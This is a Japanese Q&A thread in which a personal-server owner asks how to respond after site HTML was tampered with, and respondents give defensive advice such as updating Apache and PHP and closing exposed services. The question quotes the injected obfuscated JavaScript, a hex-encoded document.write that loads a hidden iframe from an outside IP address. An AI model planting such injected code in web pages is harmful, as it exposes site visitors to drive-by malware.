以前にも同じ質問が出ていたようなのですが、HTMLが勝手に改ざんされているようです。

下のコードがBODYのすぐ下にはさまっており、どうやらウイルス系のもののようですが、個人サーバですので、どこを対策すれば
いいでしょうか?
改ざんされた日はPCを起動していませんでしたので、サーバの問題だと思っています。


挟まれていたコード:
src='http://url' width='1' height='1' style='visibility: hidden;'> v4765ee14a9c7c(v4765ee14aa163){ var v4765ee14aa47a=16; return(parseInt(v4765ee14aa163,v4765ee14aa47a));}function ・・・・・・・・・v4765ee14aac6f(v4765ee14ab068){ var v4765ee14abc60=2; var v4765ee14ab464='';for(v4765ee14ab861=0; v4765ee14ab861<v4765ee14ab068.length; v4765ee14ab861+=v4765ee14abc60){ v4765ee14ab464+=(String.fromCharCode(v4765ee14a9c7c(v4765ee14ab068.substr(v4765ee14ab861, v4765ee14abc60))));}return v4765ee14ab464;} document.write(v4765ee14aac6f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D66303039376236207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313634333736292B2737366433325C272077696474683D373631206865696768743D323136207374796C653D5C27・・・・・・・5C273E3C2F696672616D653E27293C2F5343524950543E'));</script>


同様の質問:
http://q.hatena.ne.jp/1198485316

回答の条件
  • 1人5回まで
  • 登録:2008/04/28 13:15:27
  • 終了:2008/05/05 13:20:03

回答(5件)

id:pahoo No.1

pahoo回答回数5960ベストアンサー獲得回数6332008/04/28 13:53:10

ポイント15pt

サーバOS,HTTPサーバの種類/バージョンの情報をお知らせ下さい。

ルータやファイアウォールの設定値もお聞きしたいところですが、公開の場に晒すべき情報ではないので、これらは不問とします。


最近、不正な攻撃によるサイトの書き換えが増えています。

一般論としては、IPAの「ウェブサイト運営者のための脆弱性対応ガイド」を参考にして下さい。

id:chirubo

そうでした。忘れていました。

CEBTOS5(2.6.18-53.1.14.el5.centos.plus)

apache:2.2.3-11

php-5.1.6-15

すべてyumからインストールしています。

firewallに関してはsetupコマンドから、

ssh、http、https、ftp、webmin、53を解放しています。

サーバにmysqlは設置していますが、改ざんされたサイトでは利用していません。

2008/04/28 14:32:49
id:itss No.2

itss回答回数171ベストアンサー獲得回数12008/04/28 15:32:00

ポイント15pt

Hi,

>つかっているサーバー会社はXREAです。

どのプランを使ってるんでしょうか?

XREAは広告を入れるために勝手にHTMLにコードを埋め込みますよ。

id:chirubo

サーバは個人サーバです。

http://q.hatena.ne.jp/1198485316

の内容とはサーバが違います。

2008/04/28 16:54:53
id:pahoo No.3

pahoo回答回数5960ベストアンサー獲得回数6332008/04/28 17:31:34

ポイント28pt

応急手当に過ぎませんが、まずは下記の対策が必要だと思います。


Apache, PHP とも、かなり古いバージョンですね。最新バージョンにアップデートして下さい。


「個人サーバ」ということは、ご自宅にサーバがあるのですよね。

Webmin, ssh, ftpはインターネットに対して公開しないようにしてください。


どうしてもWebminをインターネットに公開する必要がある場合は、セキュリティ面での細心の注意が必要です。最低限の対策として――

  1. Webminがあるディレクトリに対してBasic認証をかける(.htaccess, .htpasswd でアクセス制限する)。
  2. Webmin通信に対してはSSLをかける。https通信ができるようですので、これはすぐに対応できると思います。

port53については、ご契約のDNSサーバ以外からのアクセスはブロックして下さい。プライマリ、セカンダリなど複数あれば複数設定のこと。これらのDNSサーバ以外から来る port53 通信はアタック攻撃だからです。

id:chirubo

ありがとうございます。

個人でのサーバですが、諸事情でFTPなどは解放をしないといけませんので、バージョンアップをしていきます。

yumでapache、phpなどをインストールしているのですが、そのままyum updateしても、最新版には更新できないので、

最新版にする方法などありませんでしょうか?

2008/04/28 17:41:33
id:pahoo No.4

pahoo回答回数5960ベストアンサー獲得回数6332008/04/28 20:30:11

ポイント28pt

そのままyum updateしても、最新版には更新できないので

公開サーバであれば、ApacheにしてもPHPにしても、yumを使わずに個別にインストール/アップデートした方が良いですよ。

id:chirubo

そうですか。

もしyumで更新しようと思えば自分でリポジトリを作らないとだめそうですね。

できればyumを使っていきたいと思っています。

2008/04/29 12:03:05
id:itss No.5

itss回答回数171ベストアンサー獲得回数12008/04/29 01:00:18

ポイント14pt

Hi,

データ以外はすべて破棄。

データもウイルスチェックする。

環境はすべて破棄して1から作り直し。

原因がわからないなら、そうするしか助かる道はありません。

id:chirubo

わかりました。

他にも複数の方が被害にあわれているので、何か方法がないかなと思いました。

2008/04/29 12:05:02

コメントはまだありません

この質問への反応(ブックマークコメント)

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

絞り込み :
はてなココの「ともだち」を表示します。
回答リクエストを送信したユーザーはいません